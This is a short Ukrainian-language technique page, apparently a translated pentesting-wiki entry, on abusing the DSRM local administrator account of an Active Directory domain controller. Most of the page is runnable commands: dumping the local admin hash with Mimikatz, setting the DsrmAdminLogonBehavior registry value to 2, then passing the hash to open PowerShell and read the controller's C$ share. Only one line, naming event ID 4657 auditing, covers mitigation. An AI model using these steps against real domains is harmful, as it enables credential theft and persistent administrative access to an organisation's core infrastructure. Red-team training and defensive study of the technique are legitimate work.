DSRM Credentials

DSRM Credentials

Є обліковий запис локального адміністратора в кожному DC. Маючи права адміністратора на цій машині, ви можете використовувати mimikatz для вивантаження хешу локального адміністратора. Потім, змінивши реєстр, ви можете активувати цей пароль, щоб мати можливість віддалено отримати доступ до цього локального адміністратора. Спочатку нам потрібно вивантажити хеш користувача локального адміністратора всередині DC:

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

Тоді нам потрібно перевірити, чи цей обліковий запис працює, і якщо реєстровий ключ має значення "0" або не існує, вам потрібно встановити його на "2":

Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2  #Change value to "2"

Тоді, використовуючи PTH, ви можете переглянути вміст C$ або навіть отримати оболонку. Зверніть увагу, що для створення нової сесії PowerShell з цим хешем в пам'яті (для PTH) "домен", що використовується, - це просто ім'я машини DC:

sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$

Більше інформації про це за адресами: https://adsecurity.org/?p=1714 та https://adsecurity.org/?p=1785

Пом'якшення

• ID події 4657 - Аудит створення/зміни HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior